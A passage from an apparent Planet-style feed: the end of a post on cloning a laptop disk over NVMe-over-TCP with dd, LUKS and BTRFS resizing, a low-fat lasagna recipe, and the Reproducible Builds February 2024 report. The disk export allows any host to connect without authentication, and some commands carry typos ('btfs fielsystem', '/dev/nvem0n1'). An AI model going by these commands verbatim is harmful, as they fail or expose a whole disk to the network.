<li>Resize LUKS.</li>
<li>Finally, resize the BTRFS root disk.</li>
</ol>
<div class="section" id="exporting-disk-over-nvme-tcp">
<h2>Exporting Disk over NVME TCP</h2>
<p>The easiest way suggested by my colleague to do this is using
<a class="reference external" href="https://www.freedesktop.org/software/systemd/man/latest/systemd-storagetm.service.html">systemd-storagetm.service</a>.
This service can be invoked by simply booting into <em>storage-target-mode.target</em>
by specifying <em>rd.systemd.unit=storage-target-mode.target</em>. But he suggested not
to use this, as I would need to tweak the dracut initrd image to include network
services, and configuring WiFi from this mode is painful.</p>
<p>So alternatively, I simply booted both my laptops with GRML rescue CD. And the
following step was done to export the NVME disk on my current laptop using the
nvmet-tcp module of Linux:</p>
<div class="highlight"><pre><span></span>modprobe<span class="w"> </span>nvmet-tcp
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet
mkdir<span class="w"> </span>ports/0
<span class="nb">cd</span><span class="w"> </span>ports/0
<span class="nb">echo</span><span class="w"> </span><span class="s2">"ipv4"</span><span class="w"> </span>><span class="w"> </span>addr_adrfam
<span class="nb">echo</span><span class="w"> </span><span class="m">0</span>.0.0.0<span class="w"> </span>><span class="w"> </span>addr_traddr
<span class="nb">echo</span><span class="w"> </span><span class="m">4420</span><span class="w"> </span>><span class="w"> </span>addr_trsvcid
<span class="nb">echo</span><span class="w"> </span>tcp<span class="w"> </span>><span class="w"> </span>addr_trtype
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet/subsystems
mkdir<span class="w"> </span>testnqn
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>>testnqn/allow_any_host
mkdir<span class="w"> </span>testnqn/namespaces/1
<span class="nb">cd</span><span class="w"> </span>testnqn
<span class="c1"># replace the device name with the disk you want to export</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"/dev/nvme0n1"</span><span class="w"> </span>><span class="w"> </span>namespaces/1/device_path
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>><span class="w"> </span>namespaces/1/enable
ln<span class="w"> </span>-s<span class="w"> </span><span class="s2">"../../subsystems/testnqn"</span><span class="w"> </span>/sys/kernel/config/nvmet/ports/0/subsystems/testnqn
</pre></div>
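<p>Before connecting from the new laptop, a quick sanity check on the old one shows whether the export actually took effect. A minimal sketch, assuming the configfs layout used above (the exact kernel log wording may vary by kernel version):</p>

```shell
# The port-to-subsystem symlink created above should now exist:
ls /sys/kernel/config/nvmet/ports/0/subsystems/
# The kernel log should mention nvmet-tcp listening on the configured port:
dmesg | grep -i nvmet
```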
<p>These steps ensure that the device is now exported using NVME over TCP. The next
step is to detect this on the new laptop and connect the device:</p>
<div class="highlight"><pre><span></span>nvme<span class="w"> </span>discover<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><ip><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
nvme<span class="w"> </span>connect-all<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><ip><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
</pre></div>
<p>Finally, <tt class="docutils literal">nvme list</tt> shows the device which is connected to the new laptop,
and we can proceed with the next step, which is to do the disk copy.</p>
</div>
<div class="section" id="copying-the-disk">
<h2>Copying the Disk</h2>
<p>I simply used the <tt class="docutils literal">dd</tt> command to copy the root disk to my new laptop. Since
the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it
took about 7 and a half hours to copy the entire 512GB to the new laptop. The
speed at which I was copying was about 18–20 MB/s. The other option would have
been to create an initial partition and file system and do an rsync of the root
disk or use BTRFS itself for file system transfer.</p>
<div class="highlight"><pre><span></span>dd<span class="w"> </span><span class="k">if</span><span class="o">=</span>/dev/nvme2n1<span class="w"> </span><span class="nv">of</span><span class="o">=</span>/dev/nvme0n1<span class="w"> </span><span class="nv">status</span><span class="o">=</span>progress<span class="w"> </span><span class="nv">bs</span><span class="o">=</span>40M
</pre></div>
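<p><tt class="docutils literal">dd</tt> gives no integrity guarantee on its own, so after a multi-hour copy it is worth comparing checksums of the copied span. A hedged sketch (device names as in the steps above; since the target disk is larger, only the bytes that were actually copied are hashed):</p>

```shell
SRC=/dev/nvme2n1   # old disk, connected over NVME TCP
DST=/dev/nvme0n1   # new, larger disk
# Hash exactly the number of bytes that were copied from the source:
SIZE=$(blockdev --getsize64 "$SRC")
head -c "$SIZE" "$SRC" | sha256sum
head -c "$SIZE" "$DST" | sha256sum
# The two digests must match; if not, repeat the copy.
```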
</div>
<div class="section" id="resizing-partition-and-luks-container">
<h2>Resizing Partition and LUKS Container</h2>
<p>The final part was very easy. When I launched <tt class="docutils literal">parted</tt>, it detected that the
partition table did not match the disk size and asked if it could fix it, and I
said yes. Next, I had to install <tt class="docutils literal"><span class="pre">cloud-guest-utils</span></tt> to get <tt class="docutils literal">growpart</tt> to
fix the second partition, and the following command extended the partition to
the full 1TB:</p>
<div class="highlight"><pre><span></span>growpart<span class="w"> </span>/dev/nvem0n1<span class="w"> </span>p2
</pre></div>
<p>Next, I used <tt class="docutils literal">cryptsetup resize</tt> to increase the LUKS container size.</p>
<div class="highlight"><pre><span></span>cryptsetup<span class="w"> </span>luksOpen<span class="w"> </span>/dev/nvme0n1p2<span class="w"> </span>ENC
cryptsetup<span class="w"> </span>resize<span class="w"> </span>ENC
</pre></div>
<p>Finally, I rebooted into the disk, and everything worked fine. After logging
into the system, I resized the BTRFS file system. BTRFS requires the system to
be mounted for resize, so I could not attempt it in live boot.</p>
<div class="highlight"><pre><span></span>btfs<span class="w"> </span>fielsystem<span class="w"> </span>resize<span class="w"> </span>max<span class="w"> </span>/
</pre></div>
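<p>To confirm that the whole chain of resizes (partition, LUKS container, BTRFS) lines up, the sizes can be compared on the booted system. A small sketch (device name as in the steps above; the expected values are illustrative, not taken from the original run):</p>

```shell
# Partition and dm-crypt mapping sizes, in bytes:
lsblk -b -o NAME,SIZE /dev/nvme0n1
# The root filesystem should now report roughly the full 1TB:
df -h /
```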
</div>
<div class="section" id="conclussion">
<h2>Conclusion</h2>
<p>The only benefit of this entire process is that I have a new laptop, but I still
feel like I'm using my existing laptop. Typically, setting up a new laptop takes
about a week or two to completely get adjusted, but in this case, that entire
time is saved.</p>
<p>An added benefit is that I learned how to export disks using NVME over TCP,
thanks to my colleague. This new knowledge adds to the value of the experience.</p>
</div>2024-03-10T11:45:00+00:00copyninjaValhalla's Things: Low Fat, No Eggs, Lasagna-ish
https://blog.trueelena.org/blog/drafts/low_fat_no_eggs_lasagna_ish/index.html
<article>
<section class="header">
Posted on March 10, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Acooking.html" title="All pages tagged 'craft:cooking'.">craft:cooking</a>
</section>
<section>
<p>A few notes on what we had for lunch, to be able to repeat it after the
summer.</p>
<p>There were a number of food intolerance related restrictions which meant
that the traditional lasagna recipe wasn’t an option; the result still
tasted good, but it was a bit softer and messier to take out of the pan
and into the dishes.</p>
<p>On Saturday afternoon we made fresh no-egg pasta with 200 g (durum)
flour and 100 g water; after about 1 hour it was divided into 6 parts and
rolled to thickness #6 on the pasta machine.</p>
<p>Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken
out of the freezer: this was a bit too little, 750 ml would have been
better.</p>
<p>On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of
flour, and the meat sauce was heated up.</p>
<p>Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and
7 layers of the two sauces, and left to cool down.</p>
<p>And on Sunday morning it was baked for 35 min in the oven at 180 °C.</p>
<p>With 3 people we only had about two thirds of it.</p>
<p>Next time I think we should try to use 400 - 500 g of flour (so that
it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and
divide it into 3 pans: one to eat the next day and two to freeze
(uncooked) for another day.</p>
<p>No pictures, because by the time I thought about writing a post we were
already more than halfway through eating it :)</p>
</section>
</article>2024-03-10T00:00:00+00:00Elena “of Valhalla”Reproducible Builds: Reproducible Builds in February 2024
https://reproducible-builds.org/reports/2024-02/
<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/reproducible-builds.png#right" /></a></p>
<p><strong>Welcome to the February 2024 report from the <a href="https://reproducible-builds.org">Reproducible Builds</a> project!</strong> In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.</p>
<hr />
<h3 id="reproducible-builds-at-fosdem-2024"><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">Reproducible Builds at FOSDEM 2024</a></h3>
<p><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fosdem.jpeg#right" /></a></p>
<p>Core Reproducible Builds developer Holger Levsen presented at the main track at <a href="https://fosdem.org/2024/">FOSDEM</a> on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.</p>
<p>Please see our <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><strong>comprehensive FOSDEM 2024 news post</strong></a> for the full details and links.</p>
<p><br /></p>
<h3 id="maintainer-perspectives-on-open-source-software-security"><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a></h3>
<p><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/maintainer-perspectives.png#right" /></a></p>
<p>Bernhard M. Wiedemann spotted that a recent report entitled <a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a> written by Stephen Hendrick and Ashwin Ramaswami of the <a href="https://www.linuxfoundation.org/">Linux Foundation</a> sports an infographic which mentions that “<a href="https://www.linuxfoundation.org/hubfs/LF%20Research/MaintainerSecurityBPs_Infographic.pdf">56% of [polled] projects support reproducible builds</a>”.</p>
<p><br /></p>
<h3 id="three-new-reproducibility-related-academic-papers">Three new reproducibility-related academic papers</h3>
<p>A total of three separate scholarly papers related to Reproducible Builds have appeared this month:</p>
<p><a href="https://arxiv.org/abs/2401.14635"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2401.14635.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2401.14635"><em>Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors</em></a> by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (<a href="https://www.purdue.edu/">Purdue University</a>, Indiana, USA) is concerned with the problem that:</p>
<blockquote>
<p>Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (<a href="https://arxiv.org/abs/2401.14635">arXiv</a>, <a href="https://arxiv.org/pdf/2401.14635.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<p><a href="https://arxiv.org/abs/2402.00424"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2402.00424.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2402.00424"><em>Reproducibility of Build Environments through Space and Time</em></a> by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (<a href="https://www.ip-paris.fr/">Institut Polytechnique de Paris</a>, France) addresses:</p>
<blockquote>
<p>[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.</p>
</blockquote>
<p>The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million <a href="https://nixos.org/">Nix</a> packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision.” (<a href="https://arxiv.org/abs/2402.00424">arXiv</a>, <a href="https://arxiv.org/pdf/2402.00424.pdf">full PDF</a>)</p>
<p><br /></p>
<p><a href="https://inria.hal.science/hal-04441579v2"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/msr24.png#right" /></a></p>
<p><a href="https://inria.hal.science/hal-04441579v2"><em>Options Matter: Documenting and Fixing Non-Reproducible Builds in Highly-Configurable Systems</em></a> by Georges Aaron Randrianaina, Djamel Eddine Khelladi, Olivier Zendra and Mathieu Acher (<a href="https://www.inria.fr/en/inria-centre-rennes-university">Inria centre at Rennes University</a>, France):</p>
<blockquote>
<p>This paper thus proposes an approach to automatically identify configuration options causing non-reproducibility of builds. It begins by building a set of builds in order to detect non-reproducible ones through binary comparison. We then develop automated techniques that combine statistical learning with symbolic reasoning to analyze over 20,000 configuration options. Our methods are designed to both detect options causing non-reproducibility, and remedy non-reproducible configurations, two tasks that are challenging and costly to perform manually. (<a href="https://inria.hal.science/hal-04441579v2">HAL Portal</a>, <a href="https://inria.hal.science/hal-04441579/file/msr24.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<h3 id="mailing-list-highlights">Mailing list highlights</h3>
<p>From <a href="https://lists.reproducible-builds.org/listinfo/rb-general/">our mailing list</a> this month:</p>
<ul>
<li>
<p>User <em>cen</em> posted a query asking “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003238.html">How to verify a package by rebuilding it locally on Debian</a>” which <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003240.html">received a followup from Vagrant Cascadian</a>.</p>
</li>
<li>
<p>James Addison asked “<a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003246.html">Two questions about build-path reproducibility in Debian</a>” regarding the differences in the testing performed by <a href="https://salsa.debian.org/salsa-ci-team/pipeline">Debian’s GitLab continuous integration (CI) pipeline</a> and the <a href="https://tests.reproducible-builds.org/debian/reproducible.html">Debian-specific testing performed by the Reproducible Builds project itself</a>, and followed this with a separate but related question regarding misconfigured <a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> configurations.</p>
</li>
</ul>
<p><br /></p>
<h3 id="distribution-work">Distribution work</h3>
<p><a href="https://debian.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/debian.png#right" /></a></p>
<p>In Debian this month, 5 reviews of Debian packages were added, 22 were updated and 8 were removed, adding to <a href="https://tests.reproducible-builds.org/debian/index_issues.html">Debian’s knowledge about identified issues</a>. A number of issue types were updated as well. <a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/bcae685e">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/a3137bef">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/6ac62ef7">[…]</a><a href="https://salsa.debian.org/reproducible-builds/reproducible-notes/commit/c272b790">[…]</a> In addition, Roland Clobus posted his 23rd <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003251.html">update of the status of reproducible ISO images</a> on our mailing list. In particular, Roland helpfully summarised that “all major desktops build reproducibly with <em>bullseye</em>, <em>bookworm</em>, <em>trixie</em> and <em>sid</em> provided they are built for a second time within the same DAK run (i.e. [within] 6 hours)” and that there will likely be further work at a <a href="https://wiki.debian.org/DebianEvents/de/2024/MiniDebCampHamburg">MiniDebCamp in Hamburg</a>. Furthermore, Roland also <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-February/003233.html">responded in-depth</a> to a query about a <a href="https://lists.reproducible-builds.org/pipermail/rb-general/2024-January/003217.html">previous report</a>.</p>
<p><br /></p>
<p><a href="https://github.com/keszybz/fedora-repro-build"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fedora.png#right" /></a></p>
<p><a href="https://fedoraproject.org/">Fedora</a> developer <a href="https://github.com/keszybz">Zbigniew Jędrzejewski-Szmek</a> announced a work-in-progress script called <a href="https://github.com/keszybz/fedora-repro-build"><code class="language-plaintext highlighter-rouge">fedora-repro-build</code></a> that attempts to reproduce an existing package within a <a href="https://pagure.io/koji/">koji</a> build environment. Although the <a href="https://github.com/keszybz/fedora-repro-build#readme">project’s <code class="language-plaintext highlighter-rouge">README</code> file</a> lists a number of “fields will always or almost always vary” and there is a non-zero <a href="https://pagure.io/fedora-reproducible-builds/project/issues?tags=irreproducibility">list of other known issues</a>, this is an excellent first step towards full Fedora reproducibility.</p>
<p><br /></p>
<p><a href="https://archlinux.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/archlinux.png#right" /></a></p>
<p>Jelle van der Waa <a href="https://gitlab.archlinux.org/pacman/namcap/-/merge_requests/64">introduced a new linter rule</a> for <a href="https://archlinux.org/">Arch Linux</a> packages in order to detect cache files leftover by the <a href="https://www.sphinx-doc.org/en/master/">Sphinx documentation generator</a> which are unreproducible by nature and should not be packaged. At the time of writing, 7 packages in the Arch repository are affected by this.</p>
<p><br /></p>
<p><a href="https://www.opensuse.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/opensuse.png#right" /></a></p>
<p>Elsewhere, Bernhard M. Wiedemann posted another <a href="https://lists.opensuse.org/archives/list/factory@lists.opensuse.org/thread/I66U56F5R3TR4ZTLYGPSGWINNOLZ7XP4/">monthly update</a> for his work elsewhere in openSUSE.</p>
<p><br /></p>
<h3 id="diffoscope"><a href="https://diffoscope.org"><em>diffoscope</em></a></h3>
<p><a href="https://diffoscope.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/diffoscope.png#right" /></a></p>
<p><a href="https://diffoscope.org">diffoscope</a> is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes such as uploading versions <code class="language-plaintext highlighter-rouge">256</code>, <code class="language-plaintext highlighter-rouge">257</code> and <code class="language-plaintext highlighter-rouge">258</code> to Debian and made the following additional changes:</p>
<ul>
<li>Use a deterministic name instead of trusting <code class="language-plaintext highlighter-rouge">gpg</code>’s <code class="language-plaintext highlighter-rouge">--use-embedded-filenames</code>. Many thanks to Daniel Kahn Gillmor <a href="mailto:dkg@debian.org">dkg@debian.org</a> for reporting this issue and providing feedback. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/458f7f04">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/18d69030">…</a>]</li>
<li>Don’t error-out with a traceback if we encounter <code class="language-plaintext highlighter-rouge">struct.unpack</code>-related errors when parsing Python <code class="language-plaintext highlighter-rouge">.pyc</code> files. (<a href="https://bugs.debian.org/1064973">#1064973</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/466523ac">…</a>]</li>
<li>Don’t try and compare <code class="language-plaintext highlighter-rouge">rdb_expected_diff</code> on non-GNU systems as <code class="language-plaintext highlighter-rouge">%p</code> formatting can vary, especially with respect to MacOS. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/c09d0a9e">…</a>]</li>
<li>Fix compatibility with <a href="https://docs.pytest.org/en/8.0.x/"><code class="language-plaintext highlighter-rouge">pytest</code></a> 8.0. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/ce04e0dd">…</a>]</li>
<li>Temporarily fix support for Python 3.11.8. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/5e6cfbf0">…</a>]</li>
<li>Use the <code class="language-plaintext highlighter-rouge">7zip</code> package (over <code class="language-plaintext highlighter-rouge">p7zip-full</code>) after a Debian package transition. (<a href="https://bugs.debian.org/1063559">#1063559</a>). [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/43ee3684">…</a>]</li>
<li>Bump the minimum <a href="https://black.readthedocs.io/en/stable/">Black source code reformatter</a> requirement to 24.1.1+. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/00418fb4">…</a>]</li>
<li>Expand an older changelog entry with a CVE reference. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/86645633">…</a>]</li>
<li>Make <code class="language-plaintext highlighter-rouge">test_zip</code> black clean. [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/10c0c6fc">…</a>]</li>
</ul>
<p>In addition, James Addison contributed a patch to parse the headers from <code class="language-plaintext highlighter-rouge">diff(1)</code> output correctly [<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/4648dcfa">…</a>][<a href="https://salsa.debian.org/reproducible-builds/diffoscope/commit/fa73fc2b">…</a>] — thanks! And lastly, Vagrant Cascadian pushed updates in <a href="https://guix.gnu.org/">GNU Guix</a> for diffoscope to version <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=9d52585ebd4d759607eacfef31144676b08edc81">255</a>, <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=30196aec07dab8cc0f4a614b160f1857377a6a84">256</a>, and <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=16ab67182bc1e5b046caee9a2e38b71159703f34">258</a>, and updated <em>trydiffoscope</em> to <a href="https://git.savannah.gnu.org/cgit/guix.git/commit/?id=f45d05133472a9da13eae20ba4a676c696682c90">67.0.6</a>.</p>
<p><br /></p>
<h3 id="reprotest"><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a></h3>
<p><a href="https://salsa.debian.org/reproducible-builds/reprotest"><em>reprotest</em></a> is our tool for building the same source code twice in different environments and then checking the binaries produced by each build for any differences. This month, Vagrant Cascadian made a number of changes, including:</p>
<ul>
<li>Create a (working) proof of concept for enabling a specific number of CPUs. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/cab6270">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9d0562d">…</a>]</li>
<li>Consistently use 398 days for time variation rather than choosing randomly and update <code class="language-plaintext highlighter-rouge">README.rst</code> to match. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/86365b5">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/57ab249">…</a>]</li>
<li>Support a new <code class="language-plaintext highlighter-rouge">--vary=build_path.path</code> option. [<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/f94904b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9ea2e4b">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/9b0f5dc">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reprotest/commit/94e66c4">…</a>]</li>
</ul>
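<p>For readers unfamiliar with the tool, a minimal invocation follows reprotest's documented <em>source_root</em>/<em>virtual_server</em> form. This is a sketch of general usage (it assumes reprotest is installed and you are inside an unpacked Debian source package), not a command taken from this month's changes:</p>

```shell
# Build the package in the current directory twice with the "null" virtual
# server (no container), varying the environment between the two builds,
# then compare the resulting artifacts:
reprotest . -- null
```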
<p><br /></p>
<h3 id="website-updates">Website updates</h3>
<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/website.png#right" /></a></p>
<p>A number of improvements were made to our website this month, including:</p>
<ul>
<li>
<p>Chris Lamb:</p>
<ul>
<li>Improve the relative sizing of headers. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3243e14b">…</a>]</li>
<li>Re-order and “punch” up the introduction and documentation on the <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> page. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/05a76405">…</a>]</li>
<li>Update <a href="https://reproducible-builds.org/docs/source-date-epoch/"><code class="language-plaintext highlighter-rouge">SOURCE_DATE_EPOCH</code></a> documentation re. <code class="language-plaintext highlighter-rouge">datetime.datetime.fromtimestamp</code>. Thanks, James Addison. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/502769f1">…</a>]</li>
<li>Add a <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">post about Reproducible Builds at FOSDEM 2024</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/b09d3c22">…</a>]</li>
</ul>
</li>
<li>
<p>Holger Levsen:</p>
<ul>
<li>Update the <a href="https://reproducible-builds.org/projects/guix">GNU Guix</a> page to include their <a href="https://qa.guix.gnu.org/reproducible-builds">reproducibility QA page</a>. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/d33582dc">…</a>]</li>
<li>Add Sune Vuorela and Jan-Benedict Glaw to our contributors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/3bed935a">…</a>][<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/8bf556b5">…</a>]</li>
</ul>
</li>
<li>
<p>Mattia Rizzolo:</p>
<ul>
<li>Add <a href="https://www.sovereigntechfund.de/">Sovereign Tech Fund</a>’s logo to our sponsors. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/a54f6e20">…</a>]</li>
<li>Update our sponsors list. [<a href="https://salsa.debian.org/reproducible-builds/reproducible-website/commit/de187090">…</a>]</li>
</ul>
</li>
</ul>
<p><br /></p>
<h3 id="reproducibility-testing-framework">Reproducibility testing framework</h3>
<p><a href="https://tests.reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/testframework.png#right" /></a></p>
<p>The Reproducible Builds project operates a comprehensive testing framework (available at <a href="https://tests.reproducible-builds.org"><em>tests.reproducible-builds.org</em></a>) in order to check packages and other artifacts for reproducibility. In February, a number of changes were made by Holger Levsen:</p>
<ul>
<li>
<p><a href="https://debian.org/">Debian</a>-related changes:</p>
<ul>
<li>Temporarily disable upgrading/bootstrapping Debian <em>unstable</em> and <em>experimental</em> as they are currently broken. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/ef88cc3ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7ed553444">…</a>]</li>
<li>Use the 64-bit <code class="language-plaintext highlighter-rouge">amd64</code> kernel on all <code class="language-plaintext highlighter-rouge">i386</code> nodes; no more 686 <a href="https://en.wikipedia.org/wiki/Physical_Address_Extension">PAE</a> kernels. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/53c3c39bd">…</a>]</li>
<li>Add an <a href="https://www.erlang.org/">Erlang</a> package set. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/d29d41e3b">…</a>]</li>
</ul>
</li>
<li>
<p>Other changes:</p>
<ul>
<li>Grant Jan-Benedict Glaw shell access to the Jenkins node. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/252598e99">…</a>]</li>
<li>Enable debugging for <a href="https://www.netbsd.org/">NetBSD</a> reproducibility testing. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/091fa73f1">…</a>]</li>
<li>Use <code class="language-plaintext highlighter-rouge">/usr/bin/du --apparent-size</code> in the Jenkins shell monitor. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/fd54c037d">…</a>]</li>
<li>Revert “reproducible nodes: mark osuosl2 as down”. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/37cc03eef">…</a>]</li>
<li>Thanks again to <a href="https://www.codethink.co.uk/">Codethink</a> for doubling the RAM on our <code class="language-plaintext highlighter-rouge">arm64</code> nodes. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/640c38126">…</a>]</li>
<li>Only set <code class="language-plaintext highlighter-rouge">/proc/$pid/oom_score_adj</code> to -1000 if it has not already been done. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/c99da2ef3">…</a>]</li>
<li>Add the <code class="language-plaintext highlighter-rouge">opemwrt-target-tegra</code> and <code class="language-plaintext highlighter-rouge">jtx</code> tasks to the list of zombie jobs. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/e3b188dff">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7fbed0735">…</a>]</li>
</ul>
</li>
</ul>
<p>Vagrant Cascadian also made the following changes:</p>
<ul>
<li>Overhaul the handling of <a href="https://www.openssh.com/">OpenSSH</a> configuration files after updating from Debian <em>bookworm</em>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/3e58ee08c">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7d8a99cb5">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/5484a9db0">…</a>]</li>
<li>Add two new <code class="language-plaintext highlighter-rouge">armhf</code> architecture build nodes, <code class="language-plaintext highlighter-rouge">virt32z</code> and <code class="language-plaintext highlighter-rouge">virt64z</code>, and insert them into the <a href="https://munin-monitoring.org/">Munin monitoring</a>. [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/8700924ae">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/2c462cc3c">…</a>] [<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/7feece465">…</a>][<a href="https://salsa.debian.org/qa/jenkins.debian.net/commit/6159ad4f9">…</a>]</li>
</ul>
